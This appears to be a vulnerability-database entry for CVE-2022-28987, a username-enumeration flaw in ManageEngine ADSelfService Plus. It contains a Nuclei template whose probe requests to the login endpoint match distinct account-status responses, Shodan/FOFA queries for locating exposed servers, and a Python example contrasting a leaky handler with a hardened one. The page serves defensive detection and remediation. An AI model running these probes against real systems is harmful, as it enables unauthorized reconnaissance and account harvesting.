
Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration

CVE-2022-28987
Verified

Description

Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames.
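The weakness described above is an observable discrepancy (CWE-203): the server's answer depends on whether the submitted username exists and on the account's state, so the response body itself becomes a username oracle. The following is an added illustration, not ManageEngine's code and not part of the template on this page. It contrasts a hypothetical leaky handler (returning the two status strings the template's matchers look for) with a hardened handler that answers identically regardless of the account, and a small differential check that flags the leaky one. The account table, handler names and status strings for the hardened path are constructed for this example.

```python
"""
Constructed example of CWE-203 in a login / password-reset style endpoint:
a leaky handler whose body depends on account existence and state, beside
a uniform handler that is indistinguishable across inputs.
"""
import json
import secrets

# Constructed account directory for the example: username -> account state.
ACCOUNTS = {
    "Guest": "disabled",
    "alice": "active",
}


def leaky_handler(login_name: str) -> tuple[int, str, str]:
    """Hypothetical vulnerable handler: the eSTATUS text differs for an
    unknown user, a disabled user and an active user, so the JSON body
    discloses whether the username is valid."""
    state = ACCOUNTS.get(login_name)
    if state is None:
        body = {"eSTATUS": "Permission Denied"}
    elif state == "disabled":
        body = {"eSTATUS": "Your account has been disabled"}
    else:
        body = {"eSTATUS": "Password reset link sent"}
    return 200, "application/json", json.dumps(body)


def uniform_handler(login_name: str) -> tuple[int, str, str]:
    """Hardened handler: status code, content type and body are identical for
    every input. Whether anything actually happens (e.g. a reset e-mail is
    sent) is decided here but never reflected in the response."""
    should_send = ACCOUNTS.get(login_name) == "active"
    _ = should_send  # would gate the out-of-band side effect only
    body = {"eSTATUS": "If the account exists, further instructions have been sent."}
    return 200, "application/json", json.dumps(body)


def leaks_username(handler, known_user: str) -> bool:
    """Differential check mirroring the two-request probe in the template:
    compare the response for a known account with the response for a
    random name that cannot exist. Any difference is an enumeration oracle."""
    probe = "nonexistent-" + secrets.token_hex(4)
    return handler(known_user) != handler(probe)


if __name__ == "__main__":
    for name, handler in (("leaky", leaky_handler), ("uniform", uniform_handler)):
        print(name, "leaks:", leaks_username(handler, "Guest"))
```

The check only compares the bytes of the response; a hardened endpoint should also keep response time and rate limiting independent of account existence, which a body-only comparison will not catch.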

Severity

Medium

CVSS Score

5.3

Exploit Probability

11%

Published Date

January 29, 2026

Template Author

ritikchaddha

CVE-2022-28987.yaml
id: CVE-2022-28987

info:
  name: Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration
  author: ritikchaddha
  severity: medium
  description: |
    Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames.
  impact: |
    Attackers can enumerate valid usernames, aiding targeted attacks or account harvesting.
  remediation: |
    Update to version 6202 or later.
  reference:
    - https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28987
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-28987
    epss-score: 0.11168
    epss-percentile: 0.93591
    cwe-id: CWE-203
  metadata:
    max-request: 2
    verified: false
    shodan-query: http.title:"ADSelfService Plus"
    fofa-query: title="ADSelfService Plus"
  tags: cve,cve2022,zoho,manageengine,user-enum,adselfservice,vkev

http:
  - raw:
      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=asdfnonexistent

      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=Guest

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Permission Denied")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and

      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Your account has been disabled")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100cdc006248bb863fc40a069ef3d292e8b062918e75fdeb45e2e51f5e9e6e07dad0220780bef419df2a48467358d56ff283037456179335568d60940ff6ad7e4208ac9:922c64590222798bb761d5b6d8e72950
CVSS Metrics

Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID: CVE-2022-28987
CWE ID: CWE-203

References

https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
https://nvd.nist.gov/vuln/detail/CVE-2022-28987

Remediation Steps

Update to version 6202 or later.